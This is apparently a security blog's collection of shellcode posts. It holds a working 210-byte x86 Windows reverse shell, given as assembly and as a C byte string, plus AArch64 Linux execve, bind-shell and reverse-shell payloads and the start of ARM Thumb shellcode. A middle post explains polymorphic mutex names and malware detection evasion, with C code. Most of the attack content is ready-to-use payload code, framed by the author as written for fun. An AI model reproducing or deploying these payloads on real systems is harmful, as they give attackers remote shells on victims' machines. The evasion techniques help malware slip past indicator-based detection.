Shellcode: A Tweetable Reverse Shell for x86 Windows


Since being granted a 280 character limit, many twitter users have been embedding all kinds of code into a single message. This will be a quick post showing a tweetable reverse shell for x86 windows. You’ll have to forgive me for writing about boring shellcodes again, I have nothing else to write about 😛

Payload generators seem unable to produce a reverse shell equal to or less than 210 bytes which is required before conversion to base64. The code here has been written mostly from scratch, but obviously not without influence from existing shellcodes that featured nice ideas.

There are 3 in particular I took ideas from. Not all of the code is entirely necessary, but I wanted the final code to be somewhat stable. In the end, I had to remove code to gracefully exit, so once the cmd process ends, it takes the host process with it…

Moreover, this code is unlikely to run smoothly on all versions of Windows due to elimination of code that would make it work. If you can optimize it further, I’m sure you can get it to work on all versions of windows.

Recycling ideas

The following codes were useful for writing the tweetable version.

Year Author Description
2007 weiss Traverses the PEB DLL list, and initializes all parameters before calling API, the latter of which seems to be inspired by rgb/29a viruses.
2008 weiss A function to resolve and invoke an API is kept separate from all other code. It jumps directly to the API address once found and then returns to the caller.
2009 Stephen Fewer Provides additional hashing of DLL name from PEB

Here’s the source code which can be assembled using YASM or NASM.

; 210 byte reverse shell for x86 windows
; odzhan
    bits   32

struc pushad_t
  _edi resd 1
  _esi resd 1
  _ebp resd 1
  _esp resd 1
  _ebx resd 1
  _edx resd 1
  _ecx resd 1
  _eax resd 1

      bits   32

      xor    eax, eax
      call   init_api_disp  ; load the API dispatcher
      dd     0xDF6D65D1     ; WS2_32.dll   + WSASocketA    
      db     'cmd',0h    
      dd     0D2040002h     ; sa.sin_port = htons(1234)
      dd     00100007Fh     ; sa.sin_addr = inet_addr("")
      dd     0xA324AC0C     ; WS2_32.dll   + connect
      dd     0x611AD39B     ; KERNEL32.dll + CreateProcessA
      dd     0x607F058C     ; KERNEL32.dll + WaitForSingleObject
      ;dd     0x467EDD8B     ; ntdll.dll    + RtlExitUserThread
      lodsd                 ; eax = hash to find
      pushad                ; saves api hash on stack
      xor    eax, eax
      mov    eax, [fs:eax+30h]  ; eax = (PPEB) __readfsdword(0x30);
      mov    eax, [eax+0ch] ; eax = (PPEB_LDR_DATA)peb->Ldr
      mov    edi, [eax+0ch] ; edi = ldr->InLoadOrderModuleList.Flink
      jmp    get_dll
      mov    edi, [edi]     ; edi = dte->InLoadOrderLinks.Flink
      mov    ebx, [edi+18h] ; ebx = dte->DllBase
      ; eax = IMAGE_DOS_HEADER.e_lfanew
      mov    eax, [ebx+3ch]
      ; ecx = IMAGE_DATA_DIRECTORY.VirtualAddress
      mov    ecx, [ebx+eax+78h]
      jecxz  next_dll
      ; esi = hash_dll(IMAGE_EXPORT_DIRECTORY.Name)
      mov    esi, [ebx+ecx+0ch]
      add    esi, ebx
      xor    eax, eax
      add    edx, eax ;  h += *s++
      rol    edx, 13  ;  h = ROTL32(h, 13) 
      dec    eax
      jns    hash_dll
      mov    ebp, edx
      ; esi = offset IMAGE_EXPORT_DIRECTORY.NumberOfNames 
      lea    esi, [ebx+ecx+18h]
      xchg   eax, ecx
      jecxz  next_dll        ; skip if no names
      push   edi             ; save edi
      ; save IMAGE_EXPORT_DIRECTORY.AddressOfFunctions     
      add    eax, ebx        ; eax = RVA2VA(eax, ebx)
      push   eax             ; save address of functions
      ; edi = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      add    eax, ebx        ; eax = RVA2VA(eax, ebx)
      xchg   eax, edi        ; swap(eax, edi)
      ; save IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals
      add    eax, ebx        ; eax = RVA(eax, ebx)
      push   eax             ; save address of name ordinals
      mov    esi, [edi+4*ecx-4] ; esi = RVA of API string
      add    esi, ebx           ; esi = RVA2VA(esi, ebx)
      xor    eax, eax           ; zero eax
      cdq                       ; h = 0
      add    edx, eax
      rol    edx, 13
      dec    eax
      jns    hash_name
      add    edx, ebp           ; add hash of DLL string  
      cmp    edx, [esp+_eax+12] ; hashes match?
      loopne get_name           ; --ecx && edx != hash
      pop    edx                ; edx = AddressOfNameOrdinals
      pop    esi                ; esi = AddressOfFunctions
      pop    edi                ; restore DLL entry
      jne    next_dll           ; get next DLL        
      movzx  eax, word [edx+2*ecx] ; eax = AddressOfNameOrdinals[eax]
      add    ebx, [esi+4*eax] ; ecx = base + AddressOfFunctions[eax]
      mov    [esp+_eax], ebx
      popad                        ; restore all
      jmp    eax                   ; jmp to api address
      pop    esi                   ; esi = api parameters
      lea    ebp, [esi+(api_disp - api_hash)]
      ; edi = alloc(124);    
      push   124
      pop    ecx
      sub    esp, ecx
      mov    edi, esp
      rep    stosb

      push   1
      push   2
      call   ebp

      ; CreateProcess(NULL, "cmd", NULL, NULL, 
      ;   TRUE, 0, NULL, NULL, &si, &pi);
      mov    ebx, esp       ; ebx = &si
      lea    edi, [ebx+38h] ; edi = &si.hStdInput
      inc    dword[ebx+2dh] ; si.dwFlags = STARTF_USESTDHANDLES
      stosd                 ; si.hStdInput  = s;
      stosd                 ; si.hStdOutput = s;
      stosd                 ; si.hStdError  = s;
      push   edi            ; lpProcessInformation = &pi
      push   ebx            ; lpStartupInfo = &si      
      push   edx            ; lpCurrentDirectory = NULL
      push   edx            ; lpEnvironment = NULL
      push   edx            ; dwCreationFlags = 0
      push   eax            ; bInheritHandles = TRUE
      push   edx            ; lpThreadAttributes = NULL
      push   edx            ; lpProcessAttributes = NULL
      push   esi            ; lpCommandLine = "cmd", 0
      push   edx            ; lpApplicationName = NULL
      xchg   ebx, eax
      ; connect(s, &sa, sizeof(sa));
      push   10h            ; sizeof(sa)
      push   esi            ; &sa
      push   ebx            ; s
      lodsd                 ; skip &sa
      call   ebp            ; connect
      call   ebp            ; CreateProcessA

      ; WaitForSingleObject(pi.hProcess, INFINITE);
      push   -1
      push   dword [edi]
      call   ebp   
      ; RtlExitUserThread();
      ; call   ebp

Here’s a C string…don’t forget it uses port 1234 for the network address.

#define RS2_SIZE 210

char RS2[] = {
  /* 0000 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0002 */ "\xe8\x90\x00\x00\x00"     /* call 0x97                   */
  /* 0007 */ "\xd1\x65\x6d"             /* shl dword [ebp+0x6d], 1     */
  /* 000A */ "\xdf\x63\x6d"             /* fbld tword [ebx+0x6d]       */
  /* 000D */ "\x64\x00\x02"             /* add [fs:edx], al            */
  /* 0010 */ "\x00\x04\xd2"             /* add [edx+edx*8], al         */
  /* 0013 */ "\x7f\x00"                 /* jg 0x15                     */
  /* 0015 */ "\x00\x01"                 /* add [ecx], al               */
  /* 0017 */ "\x0c\xac"                 /* or al, 0xac                 */
  /* 0019 */ "\x24\xa3"                 /* and al, 0xa3                */
  /* 001B */ "\x9b"                     /* wait                        */
  /* 001C */ "\xd3\x1a"                 /* rcr dword [edx], cl         */
  /* 001E */ "\x61"                     /* popad                       */
  /* 001F */ "\x8c\x05\x7f\x60\xad\x60" /* mov [0x60ad607f], es        */
  /* 0025 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0027 */ "\x64\x8b\x40\x30"         /* mov eax, [fs:eax+0x30]      */
  /* 002B */ "\x8b\x40\x0c"             /* mov eax, [eax+0xc]          */
  /* 002E */ "\x8b\x78\x0c"             /* mov edi, [eax+0xc]          */
  /* 0031 */ "\xeb\x02"                 /* jmp 0x35                    */
  /* 0033 */ "\x8b\x3f"                 /* mov edi, [edi]              */
  /* 0035 */ "\x8b\x5f\x18"             /* mov ebx, [edi+0x18]         */
  /* 0038 */ "\x8b\x43\x3c"             /* mov eax, [ebx+0x3c]         */
  /* 003B */ "\x8b\x4c\x03\x78"         /* mov ecx, [ebx+eax+0x78]     */
  /* 003F */ "\xe3\xf2"                 /* jecxz 0x33                  */
  /* 0041 */ "\x8b\x74\x0b\x0c"         /* mov esi, [ebx+ecx+0xc]      */
  /* 0045 */ "\x01\xde"                 /* add esi, ebx                */
  /* 0047 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0049 */ "\x99"                     /* cdq                         */
  /* 004A */ "\xac"                     /* lodsb                       */
  /* 004B */ "\x01\xc2"                 /* add edx, eax                */
  /* 004D */ "\xc1\xc2\x0d"             /* rol edx, 0xd                */
  /* 0050 */ "\x48"                     /* dec eax                     */
  /* 0051 */ "\x79\xf7"                 /* jns 0x4a                    */
  /* 0053 */ "\x89\xd5"                 /* mov ebp, edx                */
  /* 0055 */ "\x8d\x74\x0b\x18"         /* lea esi, [ebx+ecx+0x18]     */
  /* 0059 */ "\xad"                     /* lodsd                       */
  /* 005A */ "\x91"                     /* xchg ecx, eax               */
  /* 005B */ "\xe3\xd6"                 /* jecxz 0x33                  */
  /* 005D */ "\x57"                     /* push edi                    */
  /* 005E */ "\xad"                     /* lodsd                       */
  /* 005F */ "\x01\xd8"                 /* add eax, ebx                */
  /* 0061 */ "\x50"                     /* push eax                    */
  /* 0062 */ "\xad"                     /* lodsd                       */
  /* 0063 */ "\x01\xd8"                 /* add eax, ebx                */
  /* 0065 */ "\x97"                     /* xchg edi, eax               */
  /* 0066 */ "\xad"                     /* lodsd                       */
  /* 0067 */ "\x01\xd8"                 /* add eax, ebx                */
  /* 0069 */ "\x50"                     /* push eax                    */
  /* 006A */ "\x8b\x74\x8f\xfc"         /* mov esi, [edi+ecx*4-0x4]    */
  /* 006E */ "\x01\xde"                 /* add esi, ebx                */
  /* 0070 */ "\x31\xc0"                 /* xor eax, eax                */
  /* 0072 */ "\x99"                     /* cdq                         */
  /* 0073 */ "\xac"                     /* lodsb                       */
  /* 0074 */ "\x01\xc2"                 /* add edx, eax                */
  /* 0076 */ "\xc1\xc2\x0d"             /* rol edx, 0xd                */
  /* 0079 */ "\x48"                     /* dec eax                     */
  /* 007A */ "\x79\xf7"                 /* jns 0x73                    */
  /* 007C */ "\x01\xea"                 /* add edx, ebp                */
  /* 007E */ "\x3b\x54\x24\x28"         /* cmp edx, [esp+0x28]         */
  /* 0082 */ "\xe0\xe6"                 /* loopne 0x6a                 */
  /* 0084 */ "\x5a"                     /* pop edx                     */
  /* 0085 */ "\x5e"                     /* pop esi                     */
  /* 0086 */ "\x5f"                     /* pop edi                     */
  /* 0087 */ "\x75\xaa"                 /* jnz 0x33                    */
  /* 0089 */ "\x0f\xb7\x04\x4a"         /* movzx eax, word [edx+ecx*2] */
  /* 008D */ "\x03\x1c\x86"             /* add ebx, [esi+eax*4]        */
  /* 0090 */ "\x89\x5c\x24\x1c"         /* mov [esp+0x1c], ebx         */
  /* 0094 */ "\x61"                     /* popad                       */
  /* 0095 */ "\xff\xe0"                 /* jmp eax                     */
  /* 0097 */ "\x5e"                     /* pop esi                     */
  /* 0098 */ "\x8d\x6e\x1c"             /* lea ebp, [esi+0x1c]         */
  /* 009B */ "\x6a\x7c"                 /* push 0x7c                   */
  /* 009D */ "\x59"                     /* pop ecx                     */
  /* 009E */ "\x29\xcc"                 /* sub esp, ecx                */
  /* 00A0 */ "\x89\xe7"                 /* mov edi, esp                */
  /* 00A2 */ "\xf3\xaa"                 /* rep stosb                   */
  /* 00A4 */ "\x6a\x01"                 /* push 0x1                    */
  /* 00A6 */ "\x6a\x02"                 /* push 0x2                    */
  /* 00A8 */ "\xff\xd5"                 /* call ebp                    */
  /* 00AA */ "\x89\xe3"                 /* mov ebx, esp                */
  /* 00AC */ "\x8d\x7b\x38"             /* lea edi, [ebx+0x38]         */
  /* 00AF */ "\xff\x43\x2d"             /* inc dword [ebx+0x2d]        */
  /* 00B2 */ "\xab"                     /* stosd                       */
  /* 00B3 */ "\xab"                     /* stosd                       */
  /* 00B4 */ "\xab"                     /* stosd                       */
  /* 00B5 */ "\x99"                     /* cdq                         */
  /* 00B6 */ "\x57"                     /* push edi                    */
  /* 00B7 */ "\x53"                     /* push ebx                    */
  /* 00B8 */ "\x52"                     /* push edx                    */
  /* 00B9 */ "\x52"                     /* push edx                    */
  /* 00BA */ "\x52"                     /* push edx                    */
  /* 00BB */ "\x50"                     /* push eax                    */
  /* 00BC */ "\x52"                     /* push edx                    */
  /* 00BD */ "\x52"                     /* push edx                    */
  /* 00BE */ "\x56"                     /* push esi                    */
  /* 00BF */ "\x52"                     /* push edx                    */
  /* 00C0 */ "\x93"                     /* xchg ebx, eax               */
  /* 00C1 */ "\xad"                     /* lodsd                       */
  /* 00C2 */ "\x6a\x10"                 /* push 0x10                   */
  /* 00C4 */ "\x56"                     /* push esi                    */
  /* 00C5 */ "\x53"                     /* push ebx                    */
  /* 00C6 */ "\xad"                     /* lodsd                       */
  /* 00C7 */ "\xad"                     /* lodsd                       */
  /* 00C8 */ "\xff\xd5"                 /* call ebp                    */
  /* 00CA */ "\xff\xd5"                 /* call ebp                    */
  /* 00CC */ "\x6a\xff"                 /* push 0xffffffff             */
  /* 00CE */ "\xff\x37"                 /* push dword [edi]            */
  /* 00D0 */ "\xff\xd5"                 /* call ebp                    */


It was tested in a 32-bit process (Wow64) running on 64-bit versions of Windows 7 and 10. It’s unlikely to run on Windows NT. I’m already aware of all the potential problems running this code, so save your breath my friend 🙂 It was written for fun, and nothing more.

View source here

Posted in assembly, programming, security, shellcode, windows | Tagged , , , , , | Leave a comment

Polymorphic Mutex Names


Perhaps there was never any legitimate reason to use Polymorphic Mutex Names, so it’s understandable many developers never provided a solution.

It could be argued, poly mutexes serve only as a way for malicious applications to evade detection. On the other hand, they could potentially be used to defend applications from Denial of Service (DoS) attacks or termination by a malicious application.

Many developers use named mutexes to avoid multiple instances of their application running. The problem is that applications using this technique are also vulnerable to Denial of Service attacks.

First, some defintions…

Named Mutex

A mutual exclusion (mutex) is a program object that allows multiple program threads to share the same resource, but not simultaneously. Global Named Mutexes can be created to avoid multiple instances of the same application running on a system.

How to limit 32-bit applications to one instance in Visual C++ explains how to do this.

The following snippet of code is very common.

int WINAPI WinMain(...)
   const char szUniqueNamedMutex[] = "com_mycompany_apps_appname";
   HANDLE hHandle = CreateMutex( NULL, TRUE, szUniqueNamedMutex );
   if( ERROR_ALREADY_EXISTS == GetLastError() )
      // Program already running somewhere
      return(1); // Exit program

   // Program runs...

   // Upon app closing:
   ReleaseMutex( hHandle ); // Explicitly release mutex
   CloseHandle( hHandle ); // close handle before terminating
   return( 1 );

The problem with this example is when an entirely different application either intentionally or unintentionally creates a mutex of the same name. In this case: com_mycompany_apps_appname

In the remarks section for the CreateMutex API, it states the following.

If you are using a named mutex to limit your application to a single instance, a malicious user can create this mutex before you do and prevent your application from starting. To prevent this situation, create a randomly named mutex and store the name so that it can only be obtained by an authorized user. Alternatively, you can use a file for this purpose. To limit your application to one instance per user, create a locked file in the user’s profile directory.

Raymond Chen covers the topic in A single-instance program is its own denial of service

A discussion on stack exchange and another in Multiple program instance prevention in C suggest possible ways to avoid Denial of Service conditions.

Polymorphic Code

Uses a Disassembly Engine (DE) to rewrite instructions while retaining the original algorithm. The code changes itself each time it runs, but functionality of the code will remain the same.

Imagine setting the EAX register of an x86 CPU to zero. Each of the following instructions accomplish this, but they certainly appear different, don’t they?

"\x31\xc0"                 /* xor  eax, eax             */

"\x29\xc0"                 /* sub  eax, eax             */

"\xb8\x00\x00\x00\x00"     /* mov  eax, 0               */

"\x8d\x05\x00\x00\x00\x00" /* lea  eax, [0]             */

"\x83\xe0\x00"             /* and  eax, 0               */

"\x6a\x00"                 /* push 0                    */
"\x58"                     /* pop  eax                  */

"\x6b\xc0\x00"             /* imul eax, eax, 0          */

Malware Evasion Techniques

It was a blog post by the Talos Group titled “Cyber Conflict” Decoy Document Used In Real Cyber Conflict which reminded me of how malware continues to use named mutexes to prevent multiple instances of the same code running simultaneously.

This malware in particular decodes a mutex name at runtime in order to evade detection by string. Here you see the mutex name in its decoded state. That is, after it’s been deobfuscated using an XOR operation.

Talos go on to say: the actor changed the XOR key and the MUTEX name. We assume that these modifications were performed in order to avoid detection based on public IOCs.

Indicators of Compromise (IOC) is something that can be used to identify an attack, such as a Mutex name.

@osxreverser joked about the concept of polymorphic mutex names back in July. Since a polymorphic mutex name would always be different, the assumption is that it would be ineffective as a way to prevent multiple instances running.

Are polymorphic mutex names possible? Yes, they are.
Do they have a legitimate purpose? Potentially, yes.

Some searching online lead me to the following question at stack overflow which was posted in 2012.

Can a polymorphic/metamorphic worm use (the same) mutex? This would solve the problem of grinding the network into the ground and consuming all resources with multiple instances of the worm….

The answer which was accepted:

Short answer: no.

The point of polymorphic malware is to have no identifiable pattern. …. To know the name of the mutex, there must be a pattern to it. If there’s a pattern to it, the AV can use that pattern to detect the malware.

However, this answer is not entirely true…

The general consensus is that poly mutex names aren’t possible.

A proposal to generate Mutex Revocation List (MRL) is discussed in What if we had mutex revocation lists?

As the malware authors use these markers to check if they have already infected a specific machine, the mutex names can’t be truly random.

No, they can’t be truly random, but they can be more difficult to detect.

Using encryption

To the best of my knowledge, the first documented example of malware using encryption algorithms to derive mutex names was demonstrated in the TreasureHunter malware.

How Malware Generates Mutex Names to Evade Detection discuses how the TreasureHunter malware derives an MD5 hash of the Windows Product ID before using this as the global mutex name. This prevents more than one instance of the application running while simultaneously evading detection via string matching.

Loki-Bot does something similar using the MachineGUID from the Windows registry.

For more information, see Looking at Mutex Objects for Malware Discovery and Indicators of Compromise

Although the above methods don’t generate polymorphic names, only entropy and additional code to enumerate mutexes are missing.

So what kinds of crypto can be used to generate poly mutex names?

  • Key derivation function (KDF)
  • Use a password hashing algorithm along with nonce to create unique output.

  • Symmetric Encryption
  • Use a stream or block cipher with unique key to encrypt a message, can later be decrypted using same key.

  • Message Authentication Code (MAC)
  • Use a cryptographic primitive and unique key to derive hash of string. Hash can be verified using same message and key.

  • Pseudo Random Number Generator (PRNG)
  • Seed RNG using hash of unique information obtained from operating system.
    Use byte stream to obfuscate a message.

  • Asymmetric Encryption
  • Use a digital signature algorithm such as ElGamal or DSA.

Although all of the above can be used or misused to generate polymorphic mutex names, using a KDF seemed sufficient.

If we use entropy, this must be included in the name, otherwise we cannot verify ownership of the named object later when performing detection.

You can think of the mutex name as being a password if we use a KDF, and a nonce/salt being the entropy.

Mutex Name Generation

For illustration purposes, I’m using the permutation function of SipHash for a 64-bit hash function.

void permute(w128_t *state, int cnt) {
  uint32_t *s=(uint32_t*)&state->w[0];
  int      i;
  for (i=0; i<cnt; i++) {
    s[0] += s[1]; 
    s[1]=ROTL32(s[1], 5); 
    s[1] ^= s[0]; 
    s[2] += s[3]; 
    s[3]=ROTL32(s[3], 8); 
    s[3] ^= s[2]; 
    s[0] += s[3]; 
    s[3] ^= s[0]; 
    s[2] += s[1]; 
    s[1]=ROTL32(s[1], 7); 
    s[1] ^= s[2]; 
uint64_t Hexe(void *in, size_t len, uint64_t nonce)
    w128_t s;
    int    idx, i;
    uint8_t *p=(uint8_t*)in;
    w64_t   *seed=(w64_t*)&nonce;
    // zero initialize
    memset(s.b, 0, sizeof(s));

    // set 64-bit seed
    s.w[1] = seed->w[0];
    s.w[3] = seed->w[1];
    // absorb data
    while (len) {
      idx = MIN(len, HEXE_BLOCK_LEN);
      for (i=0; i<idx; i++) {
        s.b[i] ^= p[i];
      p += idx;
      len -= idx;
      permute(&s, 2);
    // add padding
    s.b[idx] ^= 0x1F;
    s.b[3]   ^= 0x80;
    // permute last time
    permute(&s, 4);
    // return 64-bit hash
    return s.q[0];

The 1st 32-bits highlighted in red are the nonce/seed value provided to Hexe with mutex name. The remaining 64-bits are returned by Hexe.

Validation is simply using the same mutex name and nonce/seed value to derive a hash which is then compared with the mutex name enumerated from system.

Additional steps

Since a lot of unique mutex names are derived from a GUID function such as CoCreateGUID() we can take things a step further and increase the length of nonce to 64-bits. This along with 64-bit hash can be converted to a GUID string.

int main(int argc, char *argv[])
    w128_t  s, r;
    OLECHAR *guid_str;
    if (argc!=2) {
      printf ("usage: hexe_hash <string>\n");
      return 0;
    // doesn't matter about source of seed value
    // just multiply using golden ratio value
    s.w[0] = rand() * 0x9e3779b9;
    s.w[1] = rand() * 0x9e3779b9;
    // derive hash of input string
    s.q[1] = Hexe(argv[1], strlen(argv[1]), &s);
    wprintf(L"Hexe Hash : %016llX%016llX\n", s.q[0], s.q[1]);
    // convert to string
    StringFromCLSID((GUID*)&s, &guid_str);
    wprintf(L"GUID      : %s\n", guid_str);
    // convert to binary
    CLSIDFromString(guid_str, (GUID*)&r);
    wprintf(L"Hexe Hash : %016llX%016llX\n", r.q[0], r.q[1]);
    return 0;  

As you can see, it looks exactly like a regular GUID now except it can also be verified using the same algorithm that generated it.

All that remains now is how to find and validate poly mutex names.

Enumerating Mutexes

We enumerate handles (file descriptors on linux) for each process of the local computer. Filter by type Mutant, filter those with no name, then attempt verification of each name.

BOOL IsRunning(PWCHAR mutex_name)
    pNtQuerySystemInformation  NtQuerySystemInformation;
    pNtQueryObject             NtQueryObject;

    w128_t                     r;
    PWCHAR                     p;
    HRESULT                    hr;
    ULONGLONG                  hash;
    ULONG                      len=0, total=0;
    NTSTATUS                   status;
    LPVOID                     list=NULL;
    DWORD                      i;
    HANDLE                     hProcess, hObject;

    BOOL                       bRunning=FALSE;
    size_t                     mutex_len;

    NtQuerySystemInformation =
        GetModuleHandle(L"ntdll"), "NtQuerySystemInformation");

    NtQueryObject =
        GetModuleHandle(L"ntdll"), "NtQueryObject");

    if (!NtQuerySystemInformation ||
        !NtQueryObject) {
      // we couldn't resolve API address
      return FALSE;

    SetPrivilege(SE_DEBUG_NAME, TRUE);

    list = xmalloc(2048);

    do {
      len += 2048;
      list = xrealloc (list, len);

      if (list==NULL) {
        // we couldn't reallocate memory
      status = NtQuerySystemInformation(SystemHandleInformation,
          list, len, &total);

    } while (status == STATUS_INFO_LEN_MISMATCH);

    if (!NT_SUCCESS(status)) {
      // we were unable to obtain list of process
      return FALSE;

    mutex_len = lstrlen(mutex_name);

    // for each handle
    for (i=0; i<h->HandleCount && !bRunning; i++)
      // skip system
      if (h->Handles[i].ProcessId == 4) continue;

      // open the process
      hProcess = OpenProcess(PROCESS_DUP_HANDLE,
         FALSE, h->Handles[i].ProcessId);

      if (hProcess != NULL)
        // try duplicate handle
        status = DuplicateHandle(hProcess,
            (HANDLE)h->Handles[i].Handle, GetCurrentProcess(),
            &hObject, 0, FALSE, DUPLICATE_SAME_ACCESS);

        if (status)
          // query basic info
          status = NtQueryObject(hObject,
              ObjectBasicInformation, &obi, sizeof(obi), &len);

          if (NT_SUCCESS(status))
            // skip object if there's no name
            if (obi.NameInformationLength !=0)
              // query the type
              len = obi.TypeInformationLength + 2;
              t = (POBJECT_TYPE_INFORMATION)xmalloc(len);

              if (t != NULL) {
                status = NtQueryObject(hObject,
                    ObjectTypeInformation, t, len, &len);

                if (NT_SUCCESS(status)) {
                  // skip object if it isn't a mutant
                  if (lstrcmpi(t->Name.Buffer, L"Mutant")!=0) {

              // query the name
              len = obi.NameInformationLength + 2;
              n = (POBJECT_NAME_INFORMATION)xmalloc(len);

              if (n != NULL) {
                status = NtQueryObject(hObject,
                    ObjectNameInformation, n, len, &len);

                if (NT_SUCCESS(status)) {
                  // obtain the absolute name
                  p = wcsrchr(n->Name.Buffer, L'\\');
                  if (p != NULL) {
                    p += 1;
                    // attempt conversion to binary
                    hr = CLSIDFromString((OLECHAR*)p, 
                    if (hr == NOERROR) {
                      // generate hash using seed
                   hash = Hexe(mutex_name, 
                       mutex_len*2, r.q[0]);
                      // do we have a match?
                      if (hash == r.q[1]) {
                        // we found poly mutex
          // close object
        // close process
    return bRunning;

An example of output from handle.c


    PWCHAR  mutex_name = L"com_mycompany_apps_appname";
    BOOL    bRunning; 
    w128_t  s, r;
    OLECHAR *guid_str;
    HANDLE  hMutex;
    // already running?
    bRunning = IsRunning(mutex_name); 
    wprintf (L"Checking: %s : %s.\n", mutex_name,
      bRunning ? L"Found instance" : L"Instance not found");
    // if not running, create it
    // doesn't matter about source of seed value
    // just multiply using golden ratio value
    s.w[0] = rand() * 0x9e3779b9;
    s.w[1] = rand() * 0x9e3779b9;
    // derive hash of input string
    s.q[1] = Hexe(mutex_name, lstrlen(mutex_name)*2, s.q[0]);
    // convert to string
    StringFromCLSID((GUID*)&s, &guid_str);
    wprintf(L"Creating: %s for %s\n", guid_str, mutex_name);
    // create
    hMutex = CreateMutex(NULL, TRUE, guid_str);
    if (ERROR_ALREADY_EXISTS == GetLastError()) {
      wprintf (L"already exists!\n");
      return 0;
    // already running?
    bRunning = IsRunning(mutex_name); 
    wprintf (L"Checking: %s : %s.\n", mutex_name,
      bRunning ? L"Found instance" : L"Instance not found");
    // close mutex 
    wprintf (L"Closing : %s\n", mutex_name);

    // already running?
    bRunning = IsRunning(mutex_name); 
    wprintf (L"Checking: %s : %s.\n", mutex_name,
      bRunning ? L"Found instance" : L"Instance not found");

Although the above example uses a hardcoded string, the MachineGUID value could also be used.


While something like this can be used for malicious purposes, defensive applications need to evade detection too.

Ideally, generation of mutex names should be created by the kernel using digital signatures, but since there is no demand for such a feature, we’re unlikely to see it implemented.

@yassine_lemmou pointed out to me that if 2 or more applications run at the same time, this would result in multiple instances running.


Posted in cryptography, programming, windows | Tagged , , , , | Leave a comment

Shellcode: Linux ARM (AArch64)


I’ve no idea how useful these will be since they were only tested on Linux Ubuntu. They were more or less derived from 32-bit codes shown here, except there’s no attempt at all to eliminate null bytes, and there are obviously different registers being used.

CPU parameters system call
32 r0-r6 r7
64 x0-x7 x8
  • Registers r0-r6 on AArch32 are used for system call parameters while registers x0-x7 on AArch64 are used.
  • Register r7 on AArch32 is used for the system call number while x8 is used on AArch64
  • Accessing the program counter (PC) directly on AArch64 is no longer possible, although relative instructions like ADR and LDR are, so perhaps there’s no need to.
  • You can no longer push/pop multiple registers which reminds of when AMD64 decided to abandon PUSHAD/POPAD.

Depending on your needs, these may require further modifcations. They all contain null bytes, so would require encoding or a complete rewrite to remove them. The following is the connect shell for example which contains many null bytes.

Execute /bin/sh

// 28 bytes
    .global _start

    // execve("/bin/sh", NULL, NULL);
    adr    x0, sh         // x0 = "/bin/sh"
    eor    x1, x1, x1     // x1 = NULL
    eor    x2, x2, x2     // x2 = NULL
    mov    x8, #221       // x8 = execve
    svc    0
    .ascii "/bin/sh\0"

Bind /bin/sh to TCP port

// 136 bytes
    .global _start

    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    x2, x2, x2   // x2 = IPPROTO_IP
    mov    x1, #1       // x1 = SOCK_STREAM
    mov    x0, #2       // x0 = AF_INET
    mov    x8, #198     // x8 = socket
    svc    0
    mov    x6, x0       // x6 = s
    // bind(s, &sa, sizeof(sa));  
    mov    x2, #16      // x2 = sizeof(sa)
    adr    x1, sin_port // x1 = &sa
    mov    x8, #200     // x8 = bind
    svc    0
    // listen(s, 0);
    eor    x1, x1, x1   // x1 = 0    
    mov    x0, x6       // x0 = s
    mov    x8, #201     // x8 = listen 
    svc    0    
    // r = accept(s, 0, 0);
    eor    x1, x1, x1
    eor    x2, x2, x2
    mov    x0, x6        // x0 = s
    mov    x8, #202      // x8 = accept    
    svc    0    
    mov    x6, x0        // x6 = r
    // dup2(r, FILENO_STDIN);
    // dup2(r, FILENO_STDOUT);
    // dup2(r, FILENO_STDERR);
    mov    x1, #2        // for 3 descriptors
    mov    x0, x6        // x0 = r
    mov    x8, #24       // x8 = dup2 
    svc    0
    subs   x1, x1, #1    // subtract one
    bpl    dup_loop

    // execve("/bin/sh", NULL, NULL);    
    eor    x1, x1, x1
    adr    x0, sh        // x0 = "/bin/sh" 
    mov    x8, #221      // x8 = execve
    svc    0
    .word  0xd2040002    // 1234, AF_INET
    .word  0x00000000    // INADDR_ANY
    .ascii "/bin/sh\0"

Reverse connect to port and spawn /bin/sh

// 104 bytes
    .global _start

    // s = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    eor    x2, x2, x2  // x2 = IPPROTO_IP
    mov    x1, #1      // x1 = SOCK_STREAM
    mov    x0, #2      // x0 = AF_INET
    mov    x8, #198    // x8 = socket 
    svc    0
    // connect(s, &sa, sizeof(sa));
    mov    x6, x0       // x6 = s
    adr    x1, sin_port // x1 = sa.sin_port
    mov    x2, #16      // x2 = sizeof(sa)
    mov    x8, #203     // x8 = connect
    svc    0
    // dup2(s, FILENO_STDIN);
    // dup2(s, FILENO_STDOUT);
    // dup2(s, FILENO_STDERR);
    mov    x1, #2        // for 3 descriptors
    eor    x2, x2, x2    // x2 = 0
    mov    x0, x6        // x0 = s
    mov    x8, #24       // x8 = dup2 
    svc    0
    subs   x1, x1, #1    // subtract 1
    bpl    dup_loop

    // execve("/bin/sh", NULL, NULL);
    adr    x0, sh        // x0 = "/bin/sh" 
    eor    x2, x2, x2    // x2 = NULL
    eor    x1, x1, x1    // x1 = NULL  
    mov    x8, #221      // x8 = execve
    svc    0
    .word  0xd2040002    // 1234, AF_INET
    .word  0x0100007f    //
    .ascii "/bin/sh\0"

View sources here

Posted in arm, assembly, security, shellcode | Tagged , , , | Leave a comment

Shellcode: Linux ARM Thumb mode


Just a quick post about some shellcodes for a raspberry pi 3 I purchased recently to learn ARM assembly.

For those interested in developing your own, you can find a full list of Linux system calls in Thumb mode here

These examples are only intended for 32-bit Linux. BSD or other OS that run on RPI3 will most likely use completely different system call numbers.

Some of you might find these 32-bit codes with comments useful as a reference if nothing else. I’ll discuss 64-bit codes in later post.


If you want to assemble these codes on raspberry pi, you can use the GNU Assembler which should already be installed.

I use runsc to test out the codes.

Thumb mode

Raspbian by default runs in ARM mode, but the architecture has support for several modes, one of which is Thumb. Thumb uses 16-bit opcodes which allows our final shellcodes to be more compact. You’ll see the following used for each code.

// 8 bytes
    .global _start

    // switch to thumb mode
    .code 32
    add    r3, pc, #1
    bx     r3

Execute /bin/sh

The Load Relative Register (LDR) instruction initializes the /bin//sh string from 32-bit mode before switching to thumb mode.

// 36 bytes
    .arch armv6
    .global _start

    .code 32
    ldr    r0, =#0x6e69622f // /bin
    ldr    r1, =#0x68732f2f // //sh

    // switch to thumb mode
    add    r2, pc, #1
    bx     r2
